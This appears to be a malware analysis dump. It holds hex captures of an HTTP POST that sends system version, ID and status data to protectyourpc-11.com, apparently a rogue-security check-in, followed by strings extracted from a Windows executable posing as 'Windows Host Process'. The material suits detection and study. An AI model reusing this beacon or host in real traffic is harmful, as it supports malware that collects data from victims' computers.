0x00000090 (00144)   743a2070 726f7465 6374796f 75727063   t: protectyourpc
0x000000a0 (00160)   2d31312e 636f6d0d 0a557365 722d4167   -11.com..User-Ag
0x000000b0 (00176)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x000000c0 (00192)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x000000d0 (00208)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x000000e0 (00224)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x000000f0 (00240)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000100 (00256)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000110 (00272)   0a766572 20636f75 6c64206e 6f742075   .ver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 31267379 7374656d   ype=g_v41&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 335f3433   status=err093_43
0x00000070 (00112)   5f313130 3031266e 3d302665 78747261   _11001&n=0&extra
0x00000080 (00128)   3d302048 5454502f 312e310d 0a486f73   =0 HTTP/1.1..Hos
0x00000090 (00144)   743a2070 726f7465 6374796f 75727063   t: protectyourpc
0x000000a0 (00160)   2d31312e 636f6d0d 0a557365 722d4167   -11.com..User-Ag
0x000000b0 (00176)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x000000c0 (00192)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x000000d0 (00208)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x000000e0 (00224)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x000000f0 (00240)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000100 (00256)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000110 (00272)   0a766572 20636f75 6c64206e 6f742075   .ver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.
.:
.

040904b0
1, 0, 0, 2
1091
Copyright (C) 2010
FileDescription
FileVersion
LegalCopyright
&Main
MS Sans Serif
PrivateBuild
ProductVersion
S&top
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
Windows Host Process
%08;p?
0=,=d8
1COo01
1nTa\j
1&tt|y,`
2*+02i
2Njr@_
3?ec8q
>3H{/U
'3@MK1
3O]gqdBr1C\VZk
`."3tB
42Vv]X
5:#& :-
%5rTai
6nj6Zm~r
6slxq'
6wr]hJ
9/-1iu
 ;a0WD
a3~:}p
 ~ac~M@
adr^;UX
ADVAPI32.dll
a!|\[\Dz
B6]%vQ
bQU1uY
c4~Hn:
CoCreateInstance
CoInitialize
CoUninitialize
%cpq?fc
Cqw&	y+
CreateClassMoniker
CreateWindowExW
$D1k~2
@.data
DDRAW.dll
DefWindowProcW
DirectDrawCreate
DirectDrawCreateEx
DirectDrawEnumerateA
DispatchMessageW
; @dwUB
Dw:x$!
Eh7?t+
EndDialog
ExitProcess
F-:5N.
fbDNvE
^Fq"HQiU
FreeEnvironmentStringsA
f'$s%8
GetCommandLineA
GetModuleFileNameA
GetModuleHandleA
GetProcessVersion
GetRunningObjectTable
GetStartupInfoA
GetStdHandle
GetSystemMetrics
GetVersionExA
GetWindowRect
<Gk4dVjU
gPP/9L
/H?A.8
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
(hFd%[
~hhlAll
hhualP
Hkem1v
hLibrh
H{mE7I
, hN;@
hQh9{@
hroteh
h<Th-Z@
hVirth
I+]acA
+_ijx1
ilL*pz
IsBadWritePtr
IsDlgButtonChecked
iTfHM\o
J4(figd
J9.)~I
j@hSA@
[Jj9&g
JjhoX@
}jL(9+
jO9QI$
$<J('Odv
J,PCL1H
K9|,	'
kbVV**
KERNEL32.dll
+kRVOe!
LdF&E8
LhP-o,A
M(h6x@
MIu|kZ~
.MMBH"
-=-MvM
nAoW9|2
NCr|~b
nPQ4IL
NRo*/_
OK3lrK
ole32.dll
OnfdWE
o"Pe )lf
/P11U<
PathAddBackslashW
PathAppendW
PathCombineW
PathFindExtensionW
PathRemoveFileSpecW
pGmGY4
PostQuitMessage
p(?QNL'
Pw-\Ew\
PxRP-D
PyHR:e
>q%g(sO6
Qi-kwmMF|[
q+Jk$G
Q]Mxu_
QVXo|	
.**_	Qw
r2q,%k
R2~w]O
`.rdata
RegCloseKey
RegCreateKeyExW
RegEnumValueA
RegEnumValueW
RegisterClassExW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
/[!rQ<
RtlUnwind
R<(*v\
r,ZaM'
SetConsoleMode
SetUnhandledExceptionFilter
SetWindowPos
SHELL32.dll
ShellExecuteExW
SHLWAPI.dll
:ShyCn
s<hZm@
SI+z_!
`=`slR
s.-o3@1
SO+)oe
ssspHm
T!1D1,
t1(h*X@
"tc|Le
!This program cannot be run in DOS mode.
TranslateMessage
U9lPPP
	ucw6V
UnhandledExceptionFilter
USER32.dll
uY6M,@
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
VQ1KSQA
:Wh7HF
wN0#w,
/wS=3F
wsprintfW
WY D35
[X^?6j
XAa*2h
X`Rdx8
xxPa?9
Yr4 {$
+%yX>)
y_x+$t
#z3G!Q
~Z^GlT3
zy,l9*